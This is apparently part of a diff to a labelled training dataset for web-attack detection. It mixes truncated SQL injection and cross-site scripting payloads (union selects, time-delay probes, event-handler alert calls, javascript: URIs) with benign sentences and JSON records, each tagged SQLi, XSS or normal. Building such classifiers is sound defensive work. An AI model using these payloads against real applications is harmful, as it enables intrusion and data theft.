+"1%"" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) |",2,SQLi,20945 +"1"" ) where 2758 = 2758 union all select null,null,",2,SQLi,12503 +1%' ) ) ) order by 1#,2,SQLi,13060 +"-1634%' union all select 5937,5937,5937,5937--",2,SQLi,19924 +1' ) or 2633 = dbms_pipe.receive_message ( chr ( 1,2,SQLi,16143 +Where's the SQL script?,0,normal,23390 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--",2,SQLi,10776 +select ( case when ( 1961 = 2048 ) then 1961 else ,2,SQLi,20717 +group by userid having 1=1--,2,SQLi,9954 +-8966%' or ( 7475 = 4014 ) *4014 and '%' = ',2,SQLi,14574 +1' in boolean mode ) and 8514 = ( select count ( *,2,SQLi,17033 +Filter junk emails.,0,normal,22768 +I'm considering where to take a class.,0,normal,23914 +"{""id"":null,""firstName"":""Fook Weng"",""lastName"":""Ow ",0,normal,27205 +1' ) ) as vdhw where 8858 = 8858 order by 1#,2,SQLi,14218 +-2393%' ) ) union all select 2772--,2,SQLi,16000 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7168 +Select plot.,0,normal,24747 +Select a hairstyle for a fresh look.,0,normal,24084 +) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (S,2,SQLi,11185 +"{""id"":null,""name"":""cake""}",0,normal,26813 +<frame id=x tabindex=1 onactivate=alert(1)></frame,1,XSS,4878 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10739 +Select and display the waveform at the circuit inp,0,normal,25646 +end and ( 'hmtt' like 'hmtt,2,SQLi,15993 +1 ) ) as vycb where 3524 = 3524 and 6414 = ( selec,2,SQLi,21728 +1' ) ) as plbt where 4368 = 4368 and 3754 = ( sele,2,SQLi,12261 +Where's your SQL origin?,0,normal,23418 +"-7802' ) ) ) or elt ( 8778 = 9974,9974 ) and ( ( (",2,SQLi,18547 +"<img src onerror /"" '""= alt=javascript:alert(1)//""",1,XSS,686 +"select * from users where id = 1 or ""1&"" or 1 = 1 ",2,SQLi,11438 +The Financial Select Sector SPDR Fund fell 3 perce,0,normal,25446 +-7239' or 5903 = ( 'qqpjq'|| ( select case 5903 wh,2,SQLi,14294 +<content onpointerout=alert(1)>XSS</content>,1,XSS,2463 +"1"" ) where 7010 = 7010 and 9660 = ( select count (",2,SQLi,12278 +"select * from users where id = 1 union select 1 $,",2,SQLi,11892 +"<data onmousedown=""alert(1)"">test</data>",1,XSS,7131 +1 ) rlike ( select * from ( select ( sleep ( 5 ) ),2,SQLi,16380 +Join the virtual meeting.,0,normal,22654 +1 ) ) or 9643 = ( select count ( * ) from domain.d,2,SQLi,21328 +"<base onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,5949 +<style>:target {color:red;}</style><plaintext id=x,1,XSS,4586 +"-3082"" ) where 1082 = 1082 or 5023 = ctxsys.driths",2,SQLi,22171 +"-4670"" ) ) or 3038 = 3038",2,SQLi,12235 +I'm planning to pick up some new clothes.,0,normal,23956 +1 where 3478 = 3478 ( select ( case when ( 4587 = ,2,SQLi,13073 +"1,row ( 7937,5067 ) > ( select count ( * ) ,concat",2,SQLi,16908 +"{""id"":null,""firstName"":""Jett"",""lastName"":""Salvador",0,normal,27012 +"<cite onmouseover=""alert(1)"">test</cite>",1,XSS,3986 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,14689 +<element onpointerdown=alert(1)>XSS</element>,1,XSS,6306 +admin' or 1=1--,2,SQLi,9911 <SCRIPT onreadystatechange=javascript:javascript:a,1,XSS,781 -"1%"" ) or 9643 = ( select count ( * ) from domain.d",2,SQLi,17154 -1'|| ( select 'eils' where 8308 = 8308 or 8514 = b,2,SQLi,21992 -"<base onmouseup=""alert(1)"">test</base>",1,XSS,5979 -1' ) or 7552 = ( select count ( * ) from rdb$field,2,SQLi,20132 -"<style>:target {color:red;}</style><p id=x style=""",1,XSS,2197 -1' and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ch,2,SQLi,14090 +"1 ) union all select null,null,null--",2,SQLi,17156 +1 ) where 2307 = 2307,2,SQLi,21994 +"<style>@keyframes x{}</style><iframe style=""animat",1,XSS,5981 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,20134 +"<tbody onmouseup=""alert(1)"">test</tbody>",1,XSS,2198 +1 ) or 9643 = ( select count ( * ) from domain.dom,2,SQLi,14092 "{""id"":null,""firstName"":""Jayden"",""lastName"":""Shen"",",0,normal,27461 -1'+ ( select vohg where 6383 = 6383 and 6055 = ctx,2,SQLi,20670 -These users can switch back and forth from regular,0,normal,25321 -<iframe/onload=alert(/INJECTX/)>,1,XSS,9833 -"<link draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,6980 -1' where 1230 = 1230 or char ( 75 ) ||char ( 70 ) ,2,SQLi,18212 -"union ( select NULL, NULL, ( select @@version ) ) ",2,SQLi,11825 -1 ) ) and 4386 = utl_inaddr.get_host_address ( chr,2,SQLi,19394 -<style>@keyframes slidein {}</style><caption style,1,XSS,2377 -1 ) where 9552 = 9552 and 1961 = 6333--,2,SQLi,20224 -1 ) or 8421 = ( select count ( * ) from generate_s,2,SQLi,17631 -I'm thinking of where to volunteer my time.,0,normal,23889 -"1 ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11484 -<details id=x tabindex=1 ondeactivate=alert(1)></d,1,XSS,6512 -1' in boolean mode ) and 5981 = 6700,2,SQLi,13280 -"""My tank's for utilitarian purposes,"" he told Sele",0,normal,26456 -"-2048 ) ) union all select 7054,7054,7054,7054,705",2,SQLi,14474 -<style>:target {color:red;}</style><output id=x st,1,XSS,5440 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10760 -<style>:target {color: red;}</style><small id=x st,1,XSS,6494 -`'><script>\x00javascript:alert(511)</script>,1,XSS,8965 -<nobr onpointerover=alert(1)>XSS</nobr>,1,XSS,5511 -"<noframes onbeforepaste=""alert(1)"" contenteditable",1,XSS,5331 -Select your affirm.,0,normal,24961 -"<style>@keyframes x{}</style><var style=""animation",1,XSS,4532 -"?TargetAS=javascript:alert(1)"",",1,XSS,9867 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,15588 -"1%"" ) or ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,16750 -or 'text' > 't',2,SQLi,10143 -1 ) as boed where 6787 = 6787,2,SQLi,12090 -Update settings.,0,normal,22805 -1' ) ) as rxxd where 5049 = 5049,2,SQLi,16532 -"1"" ) where 8407 = 8407 and 9254 = ( select count (",2,SQLi,18053 -||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=,2,SQLi,11281 -In 1602 he made his second visit to the French cap,0,normal,26028 -Select a song to dance to.,0,normal,24035 -"<noframes onmouseout=""alert(1)"">test</noframes>",1,XSS,7789 -"<h1 onmousedown=""alert(1)"">test</h1>",1,XSS,3457 -"-1256' in boolean mode ) union all select 7889,788",2,SQLi,19656 -"<figure oncut=""alert(1)"" contenteditable>test</fig",1,XSS,4941 -"<label>type a,b,c,d - watch the network tab/traffi",1,XSS,9224 -Modify the color scheme.,0,normal,22615 -He wrote Practical Sermons (1858; edited by Noah P,0,normal,26108 -1'+ ( select 'gtqr' where 5660 = 5660,2,SQLi,14917 -Can you help me decide where to take a hike?,0,normal,23725 -1' where 2160 = 2160 and exp ( ~ ( select * from (,2,SQLi,20311 -"<body onkeydown=""alert(1)"" contenteditable>test</b",1,XSS,7100 -"<plaintext oncontextmenu=""alert(1)"">test</plaintex",1,XSS,8081 -select ( case when ( 3217 = 8421 ) then 3217 else ,2,SQLi,16463 -Where can I access it?,0,normal,23473 --3083 ) or 5221 = 7829,2,SQLi,18632 -While it was once fashionable to give your baby a ,0,normal,25132 +1%' ) ) rlike ( select ( case when ( 6094 = 7893 ),2,SQLi,20672 +They are often habitual readers and they typically,0,normal,25318 +<svg/onload=alert(`INJECTX`)>,1,XSS,9835 +"<progress onpaste=""alert(1)"" contenteditable>test<",1,XSS,6982 +select case when 6662 = 9889 then 1 else null end-,2,SQLi,18214 +"select * from users where id = 1. union select 1,v",2,SQLi,11827 +1 ) where 1090 = 1090 and 6240 = ( 'qqpjq'|| ( sel,2,SQLi,19396 +<source onpointermove=alert(1)>XSS</source>,1,XSS,2378 +"1"" ) as nqtn where 5606 = 5606 and 9660 = ( select",2,SQLi,20226 +1' where 9708 = 9708 or sleep ( 5 ) --,2,SQLi,17633 +Where's the best place to capture nature's beauty?,0,normal,23891 +AND 1 = utl_inaddr.get_host_address ( ( SELECT SYS,2,SQLi,11486 +"<select onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,6514 +"1%"" ) ) rlike sleep ( 5 ) #",2,SQLi,13282 +"""The expansion of PW select mirrors the growth and",0,normal,26453 +"1"" where 6347 = 6347 union all select null,null,nu",2,SQLi,14476 +"<plaintext onbeforecopy=""alert(1)"" contenteditable",1,XSS,5442 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10762 +"<th onpaste=""alert(1)"" contenteditable>test</th>",1,XSS,6496 +`'><script>\x0Ajavascript:alert(519)</script>,1,XSS,8967 +<meter onpointerover=alert(1)>XSS</meter>,1,XSS,5513 +"<strike onpaste=""alert(1)"" contenteditable>test</s",1,XSS,5333 +Select your proclaim.,0,normal,24958 +"<title onmouseover=""alert(1)"">test</title>",1,XSS,4534 +"?baseurl=asfunction:getURL,javascript:alert(1)//"",",1,XSS,9869 +"-9959"" ) or 4747 = dbms_utility.sqlid_to_sqlhash (",2,SQLi,15590 +"1%' and ( select 9067 from ( select count ( * ) ,c",2,SQLi,16752 +);waitfor delay '0:0:__TIME__'--,2,SQLi,10145 +"1"" where 4281 = 4281",2,SQLi,12092 +Join yoga class.,0,normal,22807 +"1"" where 4978 = 4978 and 6510 = ( select count ( *",2,SQLi,16534 +"-8792 union all select 1246,1246,1246,1246,1246,12",2,SQLi,18055 +#ERROR!,2,SQLi,11283 +In 18 3 a select committee of the House of Commons,0,normal,26025 +Select a scent for your space.,0,normal,24037 +"<label onmousedown=""alert(1)"">test</label>",1,XSS,7791 +<q id=x tabindex=1 onfocusin=alert(1)></q>,1,XSS,3459 +"1"" ) as vzdq where 3160 = 3160",2,SQLi,19658 +"<shadow draggable=""true"" ondragend=""alert(1)"">test",1,XSS,4943 +"<listener event=""load"" handler=""#y"" xmlns=""http://",1,XSS,9226 +Insert your passport details.,0,normal,22617 +Help your tween or teen select age-appropriate sou,0,normal,26105 +"1"" where 9618 = 9618 and ( 3020 = 3020 ) *6703--",2,SQLi,14919 +Let's meet at the café where we first met.,0,normal,23727 +"1"" and ( select 9067 from ( select count ( * ) ,co",2,SQLi,20313 +<svg><rt onload=alert(1)></rt>,1,XSS,7102 +"<kbd draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,8083 +"1%"" ) ) ) order by 1--",2,SQLi,16465 +Join tables where needed.,0,normal,23475 +"1"" ) as vcvw where 2445 = 2445 and 8594 = ( select",2,SQLi,18634 +"While their inventory consists of newer cards, suc",0,normal,25129 "{""id"":null,""name"":""cotton""}",0,normal,27549 -Very few voters will not select a more democratic ,0,normal,25188 -I need to select a movie for our movie night.,0,normal,23836 -"1, ( begin if ( 8340 = 8340 ) then dbms_lock.sleep",2,SQLi,18664 -Select milk.,0,normal,24508 --7726 or 3038 = 3038,2,SQLi,20282 -Where's the houseboat?,0,normal,23562 -"<svg xmlns=""http://www.w3.org/2000/svg"" onload=""al",1,XSS,9313 -<style>:target {color: red;}</style><menu id=x sty,1,XSS,6173 -<h1 id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,3632 -"1"" ) ) ) or 4411 = ( select count ( * ) from sysus",2,SQLi,16956 -"<thead oncontextmenu=""alert(1)"">test</thead>",1,XSS,6273 +VIDGO will also offer live local stations in selec,0,normal,25185 +Let's find out where the nearest gas station is.,0,normal,23838 +"1' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ",2,SQLi,18666 +Select soda.,0,normal,24510 +1' in boolean mode ) ( select ( case when ( 4587 =,2,SQLi,20284 +Where's the mansion?,0,normal,23564 +<svg%0Aonload=%09((pro\u006dpt))()//,1,XSS,9315 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6175 +<textarea onauxclick=alert(1)>XSS</textarea>,1,XSS,3634 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,16958 +"<head oncopy=""alert(1)"" contenteditable>test</head",1,XSS,6275 "<script onLoad script onLoad=""javascript:javascrip",1,XSS,393 -"<figure onpaste=""alert(1)"" contenteditable>test</f",1,XSS,3192 +<svg><tbody onload=alert(1)></tbody>,1,XSS,3194 <audio src/onerror=alert(1)>,1,XSS,17 -"1%"" ) and 9764 = 6037 and ( ""%"" = """,2,SQLi,20585 -"1"" ) ) union all select null,null,null,null--",2,SQLi,19057 -"{""id"":null,""name"":""smooth""}",0,normal,27002 -Insert the missing puzzle piece.,0,normal,22549 -1 ) or 1022 = ( select count ( * ) from all_users ,2,SQLi,19878 -"So, astrology might not help you select the perfec",0,normal,25536 -<style>:target {color: red;}</style><ruby id=x sty,1,XSS,7395 -"-3219"" ) order by 1--",2,SQLi,21224 +1' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ,2,SQLi,20587 +"1 union all select null,null,null,null--",2,SQLi,19059 +"{""id"":null,""name"":""principal possible""}",0,normal,26999 +Sort the colored beads.,0,normal,22551 +1 ) where 2888 = 2888 or 8156 = ( select count ( *,2,SQLi,19880 +"Some may select charitable objectives, and good lu",0,normal,25533 +"<q onmouseover=""alert(1)"">test</q>",1,XSS,7397 +"1"" rlike ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,21226 /><img/onerror=\x22javascript:alert(1)\x22src=xxx:,1,XSS,594 -<svg><article onload=alert(1)></article>,1,XSS,4720 -<style>:target {color: red;}</style><textarea id=x,1,XSS,5828 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7",2,SQLi,10750 -Select the perfect moment.,0,normal,24346 -"1"" ) ) as sqzh where 5672 = 5672 and 5556 = ( sele",2,SQLi,22272 -"select * from generate_series ( 7667,7667,case whe",2,SQLi,18740 -1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +cha,2,SQLi,22421 -"<menuitem onmouseover=""alert(1)"">test</menuitem>",1,XSS,4799 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10635 -"<var draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,4796 -1 ) as cfnz where 6065 = 6065 union all select nul,2,SQLi,20977 -")) RLIKE SLEEP(5) AND ((1337""=""1337",2,SQLi,11235 -"<IMG SRC='vbscript:msgbox("""")'>",1,XSS,8657 +<dd onpointerleave=alert(1)>XSS</dd>,1,XSS,4722 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5830 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10752 +Randomly select a book.,0,normal,24348 +"-1999 ) union all select 1779,1779,1779,1779,1779,",2,SQLi,22274 +"1' where 4150 = 4150 and elt ( 8012 = 6026,6026 ) ",2,SQLi,18742 +1 where 4985 = 4985 order by 1#,2,SQLi,22423 +"<frame onmousemove=""alert(1)"">test</frame>",1,XSS,4801 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10637 +"<source onmouseup=""alert(1)"">test</source>",1,XSS,4798 +1' ) where 3375 = 3375 or 8315 = ( select count ( ,2,SQLi,20979 +"RLIKE SLEEP(5) AND 1337""=""1337",2,SQLi,11237 +"<style>@keyframes x{}</style><tfoot style=""animati",1,XSS,8659 "<svg><use href=""data:image/svg+xml;base64,PHN2ZyBp",1,XSS,164 "<img src=x\x09onerror=""javascript:alert(1)"">",1,XSS,672 -"{""id"":null,""name"":""blue""}",0,normal,27487 -1' ) where 4729 = 4729,2,SQLi,14309 -"{""id"":null,""firstName"":""Ashikin"",""lastName"":""Said""",0,normal,27318 -1' ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5,2,SQLi,16053 -Where's the perfect spot to watch the sunrise?,0,normal,23765 -"-6733' ) where 4024 = 4024 union all select 4024,4",2,SQLi,14829 -Randomly select food.,0,normal,24818 -Plant some aromatic herbs.,0,normal,22741 -"<dd onbeforecut=""alert(1)"" contenteditable>test</d",1,XSS,5543 -1 ) ) ) or 8421 = ( select count ( * ) from genera,2,SQLi,22392 -"<small draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,7994 -Select a method to relax.,0,normal,24023 -default,0,normal,23178 -"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay",2,SQLi,10901 -<style>:target {color: red;}</style><time id=x sty,1,XSS,7759 -"<tbody onmouseleave=""alert(1)"">test</tbody>",1,XSS,4838 -"1"" ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d45",2,SQLi,18678 -"<dfn onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,6549 -Select the perfect dress.,0,normal,24283 -"<noframes onkeypress=""alert(1)"" contenteditable>te",1,XSS,4482 -<style>:target {color:red;}</style><menuitem id=x ,1,XSS,3717 -""" or sleep(__TIME__)=""",2,SQLi,10838 -"<style>@keyframes slidein {}</style><frame style=""",1,XSS,6141 -or 0=0 --,2,SQLi,9957 -"<style>BODY{-moz-binding:url(""http://www.securityc",1,XSS,1550 -1 ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ),2,SQLi,14819 -1 ) ) as emtf where 3561 = 3561 or ( select * from,2,SQLi,18429 +"{""id"":null,""firstName"":""Kah Hong"",""lastName"":""Tan""",0,normal,26852 +"-3954' ) ) union all select 2417,2417--",2,SQLi,14311 +"{""id"":null,""name"":""society""}",0,normal,27317 +"1' and row ( 6237,7469 ) > ( select count ( * ) ,c",2,SQLi,16055 +Let's explore where the city skyline is visible.,0,normal,23767 +select ( case when ( 7980 = 3703 ) then 7980 else ,2,SQLi,14831 +Carefully select a wine.,0,normal,24820 +Where's the missing jigsaw piece?,0,normal,22743 +<dir id=x tabindex=1 onfocus=alert(1)></dir>,1,XSS,5545 +1' ) ) ) or 8315 = ( select count ( * ) from sysib,2,SQLi,22394 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7996 +Select the ideal setting for the occasion.,0,normal,24025 +materialized,0,normal,23180 +"""),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20dela",2,SQLi,10903 +"<style>@keyframes x{}</style><button style=""animat",1,XSS,7761 +"<small onpaste=""alert(1)"" contenteditable>test</sm",1,XSS,4840 +"1%"" ) or extractvalue ( 1297,concat ( 0x5c,0x71717",2,SQLi,18680 +"<object oncontextmenu=""alert(1)"">test</object>",1,XSS,6551 +Carefully select the options.,0,normal,24285 +"<progress onmouseenter=""alert(1)"">test</progress>",1,XSS,4484 +<source onpointerdown=alert(1)>XSS</source>,1,XSS,3719 +""")) or sleep(__TIME__)=""",2,SQLi,10840 +<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><,1,XSS,6143 +or 0=0 –,2,SQLi,9959 +"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://www.s",1,XSS,1551 +"1%"" and 5411 = 7697 and ""%"" = """,2,SQLi,14821 +select ( case when ( 8716 = 1338 ) then 1 else 871,2,SQLi,18431 <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SC,1,XSS,768 -"<footer draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,5694 -Select a tea flavor to relax.,0,normal,24255 -<video/poster/onerror=alert(1)>,1,XSS,9701 -"{""id"":null,""name"":""Birds Of Paradise""}",0,normal,27605 -Select a coffee blend to enjoy.,0,normal,24242 -"1"" and ( 3020 = 3020 ) *6703 and ""tnzp"" like ""tnzp",2,SQLi,19687 -<svg><set onrepeat=alert(1) attributename=x dur=1s,1,XSS,4518 -"-3361 ) ) union all select 2827,2827,2827,2827#",2,SQLi,12412 -Apple's CarPlay is coming to select vehicles from ,0,normal,26358 -Select your priority.,0,normal,24882 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3293 -"<! '=""foo""><x foo='><img src=x onerror=alert(2)//'",1,XSS,9012 -&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS,1,XSS,1404 -&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;,1,XSS,1383 -%' AND 8310=8311 AND '%'=',2,SQLi,10341 -Determine values where valid.,0,normal,23313 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,22056 -"<;HEAD>;<;META HTTP-EQUIV="";CONTENT-TYPE""; CONTENT",1,XSS,1639 -"1"" ) and 8407 = ( select count ( * ) from generate",2,SQLi,14084 -<blink onpointerleave=alert(1)>XSS</blink>,1,XSS,8801 -Calculate sums where required.,0,normal,23292 -"<bdo onpaste=""alert(1)"" contenteditable>test</bdo>",1,XSS,6407 -"<animation xlink:href=""javascript:alert(88)""/>",1,XSS,9075 -1%' ) ) and char ( 120 ) ||char ( 106 ) ||char ( 1,2,SQLi,17564 -"<isindex onmouseover=""alert(1)"">test</isindex>",1,XSS,5449 -"1%' ) and elt ( 4249 = 4249,7259 ) and ( '%' = '",2,SQLi,12169 -"<command onmouseout=""alert(1)"">test</command>",1,XSS,5079 -"-6548%"" ) union all select 6067,6067,6067,6067,606",2,SQLi,21560 -1 ) where 2734 = 2734 waitfor delay '0:0:5'--,2,SQLi,13565 -"1"" ) ) as nlgn where 3834 = 3834 and 6510 = ( sele",2,SQLi,17074 -<table onpointerenter=alert(1)>XSS</table>,1,XSS,3851 -The team decided to order pizza for lunch.,0,normal,22910 --9758'+ ( select 'rlcy' where 3691 = 3691 union al,2,SQLi,21122 -"<element ondblclick=""alert(1)"">test</element>",1,XSS,6489 -a' or 3=3--,2,SQLi,10146 -1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) a,2,SQLi,13829 -<iframe onpointerup=alert(1)>XSS</iframe>,1,XSS,7155 -The retailer is offering 89.503% off of your purch,0,normal,25384 -"<var onmouseleave=""alert(1)"">test</var>",1,XSS,6611 -"<style>@keyframes x{}</style><shadow style=""animat",1,XSS,5180 -1' in boolean mode ) and 8635 = ( select count ( *,2,SQLi,20734 -1'|| ( select 'ftey' where 1363 = 1363 and ( selec,2,SQLi,12331 --6567' ) ) union all select 3217#,2,SQLi,18269 -"1"" ) ) ) rlike ( select * from ( select ( sleep ( ",2,SQLi,19104 -"{""id"":null,""name"":""happily""}",0,normal,26771 -"<dd onmouseleave=""alert(1)"">test</dd>",1,XSS,2495 -"1%"" ) ) ) and ( select 2* ( if ( ( select * from (",2,SQLi,22332 -1 ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ,2,SQLi,19421 -"1"" where 1140 = 1140 or 2367 = ( select count ( * ",2,SQLi,22162 +<style>:target {color:red;}</style><template id=x ,1,XSS,5696 +Select the appropriate app for the task.,0,normal,24257 +"<video src=_ onloadstart=""alert(1)"">",1,XSS,9703 +"{""id"":null,""name"":""Pagumon""}",0,normal,27496 +Select a fabric for the sewing project.,0,normal,24244 +1 ) ) as xzcl where 2332 = 2332,2,SQLi,19689 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4520 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,12414 +As a Registered User you will be able to select to,0,normal,26355 +Select your consequence.,0,normal,24879 +"<optgroup onmouseout=""alert(1)"">test</optgroup>",1,XSS,3295 +"<! foo=""[[[x]]""><x foo=""]foo><script>alert(91)</sc",1,XSS,9014 +&lt;STYLE&gt;.XSS{background-image:url(&quot;javas,1,XSS,1405 +&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&ap,1,XSS,1384 +"and (select substring(@@version,1,1))='M'",2,SQLi,10343 +Fetch records where available.,0,normal,23315 +select ( case when ( 1726 = 4080 ) then 1726 else ,2,SQLi,22058 +"\"";;alert(';XSS';);//",1,XSS,1640 +1' ) ) ) rlike ( select * from ( select ( sleep ( ,2,SQLi,14086 +"<font onmouseout=""alert(1)"">test</font>",1,XSS,8803 +Choose fields where applicable.,0,normal,23294 +"<listing onkeypress=""alert(1)"" contenteditable>tes",1,XSS,6409 +<base href=//0>,1,XSS,9077 +1 ) ) as wmxa where 6485 = 6485 and 8148 = like ( ,2,SQLi,17566 +"<datalist onkeydown=""alert(1)"" contenteditable>tes",1,XSS,5451 +if ( 8858 = 5680 ) select 8858 else drop function ,2,SQLi,12171 +"<slot ondblclick=""alert(1)"">test</slot>",1,XSS,5081 +1 where 8135 = 8135,2,SQLi,21562 +1' ) ) as nhkp where 8030 = 8030,2,SQLi,13567 +1 ) where 9344 = 9344,2,SQLi,17076 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3853 +"She asked, ""Where is my missing sock?""",0,normal,22912 +-8922 or 5903 = ( 'qqpjq'|| ( select case 5903 whe,2,SQLi,21124 +"<div onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,6491 +or ''=',2,SQLi,10148 +"-2375 union all select 1573,1573,1573,1573#",2,SQLi,13831 +"<style>@keyframes x{}</style><datalist style=""anim",1,XSS,7157 +The run is for select dates from June through Sept,0,normal,25381 +"<track ondblclick=""alert(1)"">test</track>",1,XSS,6613 +<td onpointerup=alert(1)>XSS</td>,1,XSS,5182 +1 where 4091 = 4091,2,SQLi,20736 +1%' order by 1#,2,SQLi,12333 +1' or 4411 = ( select count ( * ) from sysusers as,2,SQLi,18271 +"1"" ) as fcrx where 2929 = 2929 and 2820 = 5133",2,SQLi,19106 +"{""id"":null,""firstName"":""Wei Li"",""lastName"":""Lam"",""",0,normal,26768 +<xss id=x tabindex=1 onactivate=alert(1)></xss>,1,XSS,2496 +-1629' ) ) ) or 4493 = utl_inaddr.get_host_address,2,SQLi,22334 +"-2782' ) ) or 1 group by concat ( 0x7171706a71, ( ",2,SQLi,19423 +if ( 1665 = 3845 ) select 1665 else drop function ,2,SQLi,22164 "<form><a href=""javascript:\u0061lert&#x28;1&#x29;""",1,XSS,846 -<u onpointerdown=alert(1)>XSS</u>,1,XSS,8735 -select * from users where id = '1' or \<$ or 1 = 1,2,SQLi,11917 -"select * from users where id = 1 or ""]."" or 1 = 1 ",2,SQLi,11872 -"1"" ) ) as bbkl where 5686 = 5686",2,SQLi,12416 -<mark onpointerover=alert(1)>XSS</mark>,1,XSS,7968 -Where's the mansion?,0,normal,23564 -"<summary draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,7341 -1' and 9970 = 3409,2,SQLi,13892 -Customers can select their preferred seats during ,0,normal,26255 -Was there a period where we wanted to select dialo,0,normal,25178 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7138 -"<tt draggable=""true"" ondrag=""alert(1)"">test</tt>",1,XSS,2965 -1' ) as pxcd where 9754 = 9754 or sleep ( 5 ) --,2,SQLi,15752 -"-7146"" where 6431 = 6431 or 8548 = 5549--",2,SQLi,18914 -1'+ ( select 'mdxt' where 2733 = 2733 or 4240 = ( ,2,SQLi,15477 -"<rt onmouseenter=""alert(1)"">test</rt>",1,XSS,5773 -"1' where 6721 = 6721 union all select null,null,nu",2,SQLi,17433 -Where's your SQL role?,0,normal,23430 -"1"" union all select null,null,null,null,null,null#",2,SQLi,18345 -<hr onpointerdown=alert(1)>XSS</hr>,1,XSS,2531 -; if not((select serverproperty('isintegratedsecur,2,SQLi,11139 +<em onpointerleave=alert(1)>XSS</em>,1,XSS,8737 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11919 +or isNULL ( 1/0 ) /*,2,SQLi,11874 +1'+ ( select 'cwta' where 6091 = 6091,2,SQLi,12418 +"<hgroup draggable=""true"" ondrag=""alert(1)"">test</h",1,XSS,7970 +Where's the farmhouse?,0,normal,23566 +"<label onpaste=""alert(1)"" contenteditable>test</la",1,XSS,7343 +1 rlike ( select ( case when ( 6795 = 5898 ) then ,2,SQLi,13894 +"Cyril and Augustine differ, as we should expect, i",0,normal,26252 +We have now to select such portion of this system ,0,normal,25175 +"<address onpaste=""alert(1)"" contenteditable>test</",1,XSS,7140 +<animatetransform onpointerout=alert(1)>XSS</anima,1,XSS,2966 +"1' ) ) and updatexml ( 3393,concat ( 0x2e,0x717170",2,SQLi,15754 +-1396 where 5838 = 5838 or 9323 = 9323#,2,SQLi,18916 +"-6431' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr (",2,SQLi,15479 +<style>:target {color: red;}</style><meta id=x sty,1,XSS,5775 +"1"" where 9756 = 9756",2,SQLi,17435 +Where's your SQL purpose?,0,normal,23432 +1' ) ) and 4650 = 1322#,2,SQLi,18347 +"<style>@keyframes x{}</style><dialog style=""animat",1,XSS,2532 +%2b(select*from(select(sleep(5)))a)%2b',2,SQLi,11141 "{""id"":null,""firstName"":""P Elan"",""lastName"":""Charan",0,normal,27618 -"-3130 ) union all select 1741,1741,1741,1741,1741,",2,SQLi,14717 -<nav id=x tabindex=1 onfocusin=alert(1)></nav>,1,XSS,8430 -<nobr id=x tabindex=1 onfocus=alert(1)></nobr>,1,XSS,4918 -"<hgroup onmousedown=""alert(1)"">test</hgroup>",1,XSS,5902 -<marquee id=x tabindex=1 onactivate=alert(1)></mar,1,XSS,8287 -"1%' ) ) union all select null,null,null,null,null,",2,SQLi,20644 -"Select Policies, and then select the policy you wa",0,normal,25614 -<style>:target {color: red;}</style><menuitem id=x,1,XSS,5657 -"1%"" ) or char ( 119 ) ||char ( 100 ) ||char ( 99 )",2,SQLi,16128 -1 ) ) as rwsn where 9946 = 9946 or extractvalue ( ,2,SQLi,22482 -<sup onpointerdown=alert(1)>XSS</sup>,1,XSS,5908 -<shadow onpointerup=alert(1)>XSS</shadow>,1,XSS,7374 -1' ) ) and 6510 = ( select 